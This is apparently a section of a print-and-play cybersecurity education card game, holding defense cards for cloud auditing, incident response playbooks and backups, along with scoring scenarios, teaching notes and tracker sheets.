│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement Kubernetes network policies│
│ to restrict container-to-container  │
│ communication. Deploy role-based     │
│ access control (RBAC) for API access│
│ and service accounts. Enforce pod   │
│ security policies and admission     │
│ controllers.                        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Implements micro-segmentation in    │
│ containerized environments. Prevents:│
│ - Lateral movement between pods     │
│ - Container escape attacks accessing │
│  host network                       │
│ - Privilege escalation via RBAC     │
│ - Unauthorized Kubernetes API access│
│                                     │
│ COMPLEXITY: Requires mature         │
│ Kubernetes operations and expertise. │
└─────────────────────────────────────┘

Cloud Security Posture Management (CSPM)

Card D-34: Cloud Configuration Auditing (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD CONFIGURATION AUDITING        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy continuous cloud configuration│
│ monitoring (AWS Config, Azure Policy│
│ Manager, GCP Cloud Asset Inventory).│
│ Scan for misconfigured resources:   │
│ - Public S3 buckets                 │
│ - Overly permissive IAM policies    │
│ - Unencrypted databases             │
│ - Open security groups              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects misconfigurations that allow│
│ unauthorized access:                │
│ - Public database access            │
│ - Exposed credentials in configs    │
│ - Overly broad IAM permissions      │
│ - Disabled encryption/logging       │
│ Alert on drift from secure baseline.│
│                                     │
│ LIMITATION: Only catches known      │
│ misconfiguration patterns.          │
└─────────────────────────────────────┘

Card D-35: Cloud Access & Permission Auditing (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD ACCESS & PERMISSION AUDITING  │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Audit all IAM roles, service        │
│ accounts, and API credentials for   │
│ over-privilege. Implement least-    │
│ privilege access. Regularly review  │
│ who has what permissions. Detect    │
│ and revoke unused credentials.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents attackers from leveraging: │
│ - Exposed API keys with broad       │
│  permissions                        │
│ - Service accounts with admin access│
│ - Stale credentials from departed   │
│  employees                          │
│ - Cross-account trust abuse         │
│ Reduces blast radius if credentials │
│ are compromised.                    │
│                                     │
│ REQUIRES: Strong governance process │
│ to maintain least-privilege state.  │
└─────────────────────────────────────┘

Card D-36: Cloud Compliance & Audit Trail (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD COMPLIANCE & AUDIT TRAIL      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable comprehensive cloud audit    │
│ logging (CloudTrail, Stackdriver,   │
│ Activity Monitor). Forward all logs  │
│ to immutable, centralized storage.  │
│ Monitor for unauthorized API calls, │
│ data access, and resource changes.  │
│ Enable MFA Delete on audit logs.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides forensic trail for:        │
│ - Detecting API token abuse        │
│ - Investigating data exfiltration   │
│ - Compliance reporting              │
│ - Incident response timeline        │
│ Prevents attackers from covering    │
│ tracks (immutable logs). Enables    │
│ rapid investigation of cloud API    │
│ compromises.                        │
│                                     │
│ COST: High storage requirements.    │
└─────────────────────────────────────┘

Incident Response Playbooks

Card D-37: Playbook: Ransomware Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: RANSOMWARE RESPONSE       │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built, tested ransomware response│
│ playbook covering:                  │
│ - Immediate network isolation steps │
│ - Communication procedures          │
│ - Forensic data collection          │
│ - Restoration procedures            │
│ - Stakeholder notifications         │
│ Train incident response team on     │
│ playbook annually.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 or when ransomware   │
│ is detected:                        │
│ Get +4 bonus to defense rolls when  │
│ responding to ransomware threats.   │
│ Reduces response time, limiting     │
│ damage.                             │
│                                     │
│ EDUCATIONAL VALUE: Teaches incident │
│ response process and coordination.  │
└─────────────────────────────────────┘

Card D-38: Playbook: Credential Compromise Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: CREDENTIAL COMPROMISE     │
│ RESPONSE                            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built playbook for credential   │
│ compromise scenarios:               │
│ - Identify affected accounts        │
│ - Forced password reset procedures  │
│ - Session invalidation              │
│ - MFA re-enrollment process         │
│ - Forensic user activity review     │
│ - Privileged account audit          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When investigating compromised      │
│ credentials:                        │
│ Get +4 bonus to defense rolls.      │
│ Allows rapid containment before     │
│ lateral movement occurs.            │
│                                     │
│ EXAMPLE USE: During "Mimikatz       │
│ Credential Dumping" threat, playbook│
│ helps isolate affected accounts.    │
└─────────────────────────────────────┘

Card D-39: Playbook: Insider Threat Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: INSIDER THREAT RESPONSE   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Comprehensive insider threat        │
│ response playbook including:        │
│ - HR coordination protocols         │
│ - Legal review and preservation     │
│ - Forensic evidence collection      │
│ - Physical security response        │
│ - System access removal procedures  │
│ - Communication to management       │
│ Requires cross-functional team      │
│ coordination.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When responding to insider threats: │
│ Get +5 bonus to defense rolls.      │
│ Requires strong organizational      │
│ processes to be effective.          │
│                                     │
│ EXAMPLE USE: When "Malicious        │
│ Insider Data Theft" is detected,    │
│ playbook coordinates response across │
│ security, HR, legal, and executives.│
└─────────────────────────────────────┘

Card D-40: Playbook: Supply Chain Breach Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: SUPPLY CHAIN BREACH       │
│ RESPONSE                            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Specialized playbook for supply     │
│ chain compromises:                  │
│ - Vendor notification procedures    │
│ - Industry coordination             │
│ - Affected system inventory         │
│ - Patch deployment prioritization   │
│ - Third-party impact assessment     │
│ - Public communication strategy     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 when defending       │
│ against supply chain attacks:       │
│ Get +5 bonus to defense rolls.      │
│ Requires vendor relationships and   │
│ industry collaboration.             │
│                                     │
│ LEARNING: Teaches that supply chain │
│ incidents require industry response.│
└─────────────────────────────────────┘

Backup & Disaster Recovery

Card D-41: Backup Strategy - 3-2-1 Rule (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP STRATEGY - 3-2-1 RULE        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup rule:    │
│ - 3 copies of data                  │
│ - 2 different media types           │
│ - 1 copy offline/offsite            │
│ Regular backup verification testing.│
│ Document retention and recovery RPO/│
│ RTO (Recovery Point/Time Objectives).│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ If ransomware encrypts data:        │
│ Recovery becomes possible without   │
│ paying ransom. Offline backups      │
│ ensure attacker cannot delete them. │
│ Reduces ransomware attack impact    │
│ significantly.                      │
│                                     │
│ LIMITATION: Only effective if       │
│ backups are regularly tested and    │
│ truly offline.                      │
└─────────────────────────────────────┘

Card D-42: Immutable Backup Storage (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IMMUTABLE BACKUP STORAGE            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy backup storage with WORM     │
│ (Write-Once-Read-Many) protection.  │
│ Once backups are written, they      │
│ cannot be modified or deleted,      │
│ even by administrators. Implement   │
│ MFA Delete on storage. Use air-gapped│
│ backup network.                     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Even if attacker gains admin access │
│ or compromises backup system:       │
│ Backups remain protected and        │
│ unmodifiable. Enables guaranteed    │
│ recovery. Works against double-     │
│ extortion ransomware attacks.       │
│                                     │
│ COST: Higher storage cost for       │
│ immutable solutions.                │
└─────────────────────────────────────┘

Card D-43: Disaster Recovery Plan & Testing (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DISASTER RECOVERY PLAN & TESTING    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish comprehensive disaster    │
│ recovery plan (DRP) including:      │
│ - Failover procedures               │
│ - Alternate site readiness          │
│ - Recovery procedures (step-by-step)│
│ - Communication protocols           │
│ - Key personnel contacts            │
│ Conduct quarterly DRP drills and    │
│ recovery testing.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During ransomware or supply chain   │
│ attacks:                            │
│ Get +3 bonus to all defense rolls   │
│ after initial containment. Enables  │
│ business continuity.                │
│                                     │
│ EDUCATIONAL VALUE: Teaches business │
│ continuity planning and resilience. │
└─────────────────────────────────────┘

Defense Card Integration Guide

By Threat Type Mapping

Against Supply Chain Attacks (T-13, T-14): - D-31: Container Image Scanning - D-29: Process Behavior Analysis (catches apps compromised by supply chain attacks) - D-40: Playbook: Supply Chain Breach Response

Against Insider Threats (T-15, T-16): - D-28: Baseline Behavior Learning System - D-29: Process Behavior Analysis - D-39: Playbook: Insider Threat Response

Against IoT Compromise (T-17): - D-25: Application Whitelisting - D-31: Container Image Scanning (if containerized) - D-28: Baseline Behavior Learning System

Against Cloud API Abuse (T-18): - D-34: Cloud Configuration Auditing - D-35: Cloud Access & Permission Auditing - D-36: Cloud Compliance & Audit Trail

Against DNS Tunneling (T-19): - D-28: Baseline Behavior Learning System (network baseline) - D-30: Machine Learning Anomaly Detection

Against Physical Security Bypass (T-20): - D-28: Baseline Behavior Learning System (detection) - D-38: Playbook: Credential Compromise Response

Against Ransomware (T-11, supply chain variants): - D-41: Backup Strategy - 3-2-1 Rule - D-42: Immutable Backup Storage - D-43: Disaster Recovery Plan & Testing - D-37: Playbook: Ransomware Response


Sample Defense Card Combinations

"Enterprise Ransomware Defense" (4 cards, 55 Budget)

"Cloud-Native Security" (4 cards, 75 Budget)

"Insider Threat Detection & Response" (4 cards, 75 Budget)

"Zero-Trust Architecture" (5 cards, 95 Budget)


Hardening Module with Expansion Defense Cards

Hardening Scenario: Enterprise Defense Build-Out (7 turns, v2.2)

Starting Budget: 150 | Turn Limit: 7 (one action per turn; up to 2 BASIC defenses may be deployed as one action)

Turn 1 (Foundation): D-34 Cloud Configuration Auditing (10) + D-25 Application Whitelisting (10) — Quick-Win pair → 20 spent Turn 2 (Foundation): D-41 Backup Strategy - 3-2-1 Rule (10) + D-31 Container Image Scanning (10) — Quick-Win pair → 40 spent Turn 3 (Advanced Layer): D-28 Baseline Behavior Learning System (15) → 55 spent Turn 4 (Advanced Layer): D-32 Container Runtime Protection (15) → 70 spent Turn 5 (Advanced Layer): D-35 Cloud Access & Permission Auditing (15) → 85 spent Turn 6 (Preparation): Create MALWARE playbook (10) → 95 spent Turn 7 (Expert Layer): D-36 Cloud Compliance & Audit Trail (25) → 120 spent, 30 remaining

Final Security Score Calculation (v2.2 formula): - (8 defenses deployed × 5) = 40 points - (0 hardening upgrades × 2) = 0 points - (1 playbook × 10) = 10 points - (3 of 4 pentester tactics defended × 5) = 15 points - Budget efficiency: (30 / 150) × 10 = 2 points - Total: 67 points (Strong defense-in-depth — Victory: score ≥ 60, ≥ 4 defenses, majority of tactics defended)


Pentester Tactic Card Interactions with Defense Cards (v2.2)

When a Pentester Tactic Card (PT-01 to PT-08, see ../../hardening/core-deck/pentester-tactic-cards.md) is drawn during a Hardening phase, these expansion defenses may be chosen as the single resolving defense. Use the bonus below as the chosen defense's printed bonus in the canonical formula (d20 + printed bonus + upgrades + playbook vs. the tactic's DC):

PT-01: Social Engineering - Pretexting (DC 12)

PT-02: Malware Evasion - Living-off-the-Land (DC 13)

PT-03: Credential Dumping - Mimikatz (DC 13)

PT-04: Lateral Movement - Network Traversal (DC 13)

PT-05: Privilege Escalation - Kernel Exploit (DC 14)

PT-06: Data Exfiltration - Unmonitored Channel (DC 14)

PT-07: Supply Chain Compromise - Trusted Update (DC 14)

PT-08: Insider Threat - Malicious Administrator (DC 15)


Teaching Notes for Defense Card Expansion

Application Whitelisting (D-25, D-26, D-27)

Why it matters: - Stops 90%+ of malware variants if properly configured - "Defense in depth" - cheap to start, expensive to perfect - Trade-off: Security vs. usability (users can't run unauthorized apps)

Real-world context: - Used by government agencies and financial institutions - Apple's approach (iOS/macOS sandboxing) - Increasingly common in "zero trust" architectures

Discussion points: - "What's blocked by living-off-the-land blocker that regular whitelisting isn't?" - "Why is adoption slow despite effectiveness?"

Behavioral Analytics (D-28, D-29, D-30)

Why it matters: - Catches attacks that don't match known signatures - Foundation for modern threat detection - Requires "normal" baseline to be effective

Real-world context: - Splunk, Elastic, Sentinel use behavioral analytics - UEBA systems detect insider threats - Process behavior monitoring by Crowdstrike, Falcon, Tanium

Discussion points: - "What counts as 'abnormal' and who decides?" - "How do you build a baseline without including attacks?" - "Why can't signature-based antivirus do this?"

Container Security (D-31, D-32, D-33)

Why it matters: - Container environments have unique attack surfaces - Rapid deployment means traditional approaches fail - Network segmentation at container level is powerful

Real-world context: - Kubernetes is now the standard container orchestrator - Docker/container adoption is 90%+ in enterprises - Container escape vulnerabilities (runc, containerd, etc.)

Discussion points: - "How is container security different from VM security?" - "Why is network policy critical in Kubernetes?" - "What's an example of a container escape attack?"

Cloud Security Posture Management (D-34, D-35, D-36)

Why it matters: - Cloud misconfigurations are leading breach cause - Shared responsibility model confuses organizations - API-driven access requires different monitoring

Real-world context: - Hundreds of millions exposed via public S3 buckets - Capital One breach: misconfigured WAF - Equifax: unpatched open-source component in cloud environment

Discussion points: - "Who's responsible for cloud security: vendor or organization?" - "How do you audit permissions when there are 1000s of IAM roles?" - "Why is 'least privilege' hard to achieve in practice?"

Incident Response Playbooks (D-37, D-38, D-39, D-40)

Why it matters: - Pre-planning reduces response time significantly - Coordination across teams is critical - Written procedures prevent panic decisions

Real-world context: - Organizations without playbooks average 9+ month detection time - With playbooks, average drops to 3-4 months - Playbooks required by HIPAA, PCI-DSS, NIST frameworks

Discussion points: - "Who should be involved in ransomware response?" - "How do you balance forensics with business recovery?" - "Why test playbooks if you hope to never use them?"

Backup & Disaster Recovery (D-41, D-42, D-43)

Why it matters: - Ransomware made backups critical (not just compliance) - Recovery is often cheapest way to respond to attacks - Immutable backups prevent attacker deletion

Real-world context: - Many ransomware attacks double-extort (steal + encrypt) - Immutable backups became critical after backup deletion attacks - AWS S3, Azure Blob WORM protection adopted widely

Discussion points: - "Can backups be targeted by attackers?" - "What's the difference between backup and disaster recovery?" - "Why would immutable backups be controversial?"


Expansion Defense Card Deck Summary

Card Title Tier Budget Countermeasure
D-25 Application Whitelisting BASIC 10 MALWARE
D-26 Advanced Application Control with AI ADVANCED 15 MALWARE
D-27 Living-Off-The-Land Blocker ELITE 25 MALWARE
D-28 Baseline Behavior Learning System ADVANCED 15 NETWORK
D-29 Process Behavior Analysis ADVANCED 15 MALWARE
D-30 Machine Learning Anomaly Detection ELITE 25 MALWARE
D-31 Container Image Scanning BASIC 10 MALWARE
D-32 Container Runtime Protection ADVANCED 15 MALWARE
D-33 Kubernetes Network Policy & RBAC ELITE 25 NETWORK
D-34 Cloud Configuration Auditing BASIC 10 CREDENTIAL ABUSE
D-35 Cloud Access & Permission Auditing ADVANCED 15 CREDENTIAL ABUSE
D-36 Cloud Compliance & Audit Trail ELITE 25 DATA EXFIL
D-37 Playbook: Ransomware Response ADVANCED 15 MALWARE
D-38 Playbook: Credential Compromise Response ADVANCED 15 CREDENTIAL ABUSE
D-39 Playbook: Insider Threat Response ELITE 25 DATA EXFIL
D-40 Playbook: Supply Chain Breach Response ELITE 25 WEB EXPLOIT
D-41 Backup Strategy - 3-2-1 Rule BASIC 10 MALWARE
D-42 Immutable Backup Storage ADVANCED 15 MALWARE
D-43 Disaster Recovery Plan & Testing ELITE 25 MALWARE

Total Expansion Cards: 19 (D-25 to D-43) Budget Range: 10 (BASIC) to 25 (ELITE) Distribution: 4 BASIC (D-25, D-31, D-34, D-41), 8 ADVANCED (D-26, D-28, D-29, D-32, D-35, D-37, D-38, D-42), 7 ELITE (D-27, D-30, D-33, D-36, D-39, D-40, D-43)


Building Custom Scenarios with Expansion Cards

Template: "Expert Level Scenario"

Setup: - 5-card threat chain (mix of base + expansion threats) - Starting Budget: 120 - Turn Limit: 11 [(5 × 2) + 1, per core rules §3a]

Incident Response Attack Chain Example: 1. Compromised Software Vendor Update (T-13) → MALWARE 2. Lateral Movement via SMB (T-04) → NETWORK 3. Cloud API Token Theft (T-18) → CREDENTIAL ABUSE 4. Disgruntled Employee Sabotage (T-16) → MALWARE 5. Data Exfiltration (T-19: DNS Tunneling) → DATA EXFIL

Incident Response Recommended Defense Starting Hand: - D-31: Container Image Scanning (10) - D-28: Baseline Behavior Learning System (15) - D-34: Cloud Configuration Auditing (10) - D-35: Cloud Access & Permission Auditing (15) - D-37: Playbook: Ransomware Response (15) - reusable

Hardening Strategy: - Deploy D-32, D-33 for container security - Deploy D-36 for cloud audit trails - Deploy D-30 for insider threat detection - Prepare D-39 playbook for insider coordination

Pentester Tactics to Draw (Hardening): 1. PT-07: Supply Chain Compromise (countered by D-31, D-40) 2. PT-02: Malware Evasion - Living-off-the-Land (countered by D-27, D-30) 3. PT-09: Multi-Vector Attack, expansion (countered by D-33, D-35)


Printable Card Layout

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use different color for expansion deck (e.g., teal background vs. white)
  3. Cut along dotted lines
  4. Consider laminating or card sleeves
  5. Store in separate box from base deck

Color Coding Suggestions


Recommended Deck Combinations

Complete Game with All Cards

Recommended Play: Use subsets based on experience level - Beginners: Base deck only - Intermediate: Base + 4 expansion threats (choose scenario) - Advanced: Base + all expansion cards


Quick Integration Checklist


Expansion Defense Card Set for Incident Zero
Use these cards to add modern security controls to your game
For integration guides and teaching notes, see above sections

cards/print-templates/tracker-sheets.md

Tracker Sheets (Print & Play)

Version: 2.2 - Playtest Edition

Print on plain A4. One Universal Sheet per table, plus the module sheet for the module you're playing. Tip: laminate and use a dry-erase marker, or move a coin/token along the tracks.


Universal Tracker Sheet (all modules)

Turn Track

Cross off as each turn ends. Circle your turn limit before starting.

 1   2   3   4   5   6   7   8   9   10   11   12   13   14   15   16
[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]

Budget Track

Start at your module's budget (Network Building 40-60 · Disaster Recovery 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150). Tick down in 5s.

150 145 140 135 130 125 120 115 110 105 100  95  90  85  80  75
 70  65  60  55  50  45  40  35  30  25  20  15  10   5   0

Reputation / Score Track (0-100)

100  95  90  85  80  75  70  65  60  55  50  45  40  35  30  25  20  15  10  5  0

Uncontained Threats (Incident Response)

 0   1   2   3   4   5
[ ] [ ] [ ] [ ] [ ] [ ]      Penalty at start of turn: -5 Budget each

Forensics Module Sheet — Progress Meters

Advance each meter per card effects. Victory thresholds marked ▲.

ATTRIBUTION      0   10   20   30   40   50   60   70   80   90▲  100
TIMELINE         0   10   20   30   40   50   60   70   80▲  90   100
ATTACK CHAIN     0   10   20   30   40   50   60   70   80▲  90   100
CHAIN OF CUSTODY 0   10   20   30   40   50   60   70▲  80   90   100

Victory check (end of game): - V1 Full Attribution: Attribution ≥90 AND Timeline ≥80 - V2 Solid Case: Timeline ≥80 AND Attack Chain ≥80 AND Chain of Custody ≥70 - V3 Partial Findings: any two meters ≥70

Investigation in flight: ____ (results arrive Turn _) Evidence collected (✓ = Analyzed, one Analyze per card):

Evidence card Documented? (+5% CoC) Analyzed?

Disaster Recovery Module Sheet

Crisis Progress Tracks

INVESTIGATION   0   10   20   30   40   50   60   70   80   90   100
REMEDIATION     0   10   20   30   40   50   60   70   80   90   100
COMMUNICATION   0   10   20   30   40   50   60   70   80   90   100

Stakeholder Trust (0-100%; any stakeholder at 0% = company collapses)

Stakeholder 100 80 60 40 20 (critical) 0 (LOSS)
Customers
Employees
Regulators
Board / Investors
Media / Public

Deadline Timeline (mark scheduled events at setup)

Turn 1 2 3 4 5 6 7 8
Scheduled event
Deadline Customers notified (recommended) Regulator penalties begin GDPR 72h — regulators notified

Multi-turn action in flight: ____ (completes Turn _)


Audit & Compliance Module Sheet — Scoring Worksheet

# Domain Stars (1-5) PASS (3★+) / FAIL (1-2★) Key gap found
1 Network Segmentation
2 Identity & Access
3 Detection & Monitoring
4 Backup & Recovery
5 Cloud Security
6 Security Operations

Result: ___ / 6 PASS — Gap penalties for follow-on modules: see module rules (total capped at -30).


Network Building Module Sheet — Score Sheet

Category Points Notes
Requirements met per requirement card
Security coverage per rules scoring table
Capability coverage per rules scoring table
Budget management per rules scoring table
TOTAL

Components placed:

Component Cost Capacity used / total

Budget remaining: ___ / starting ___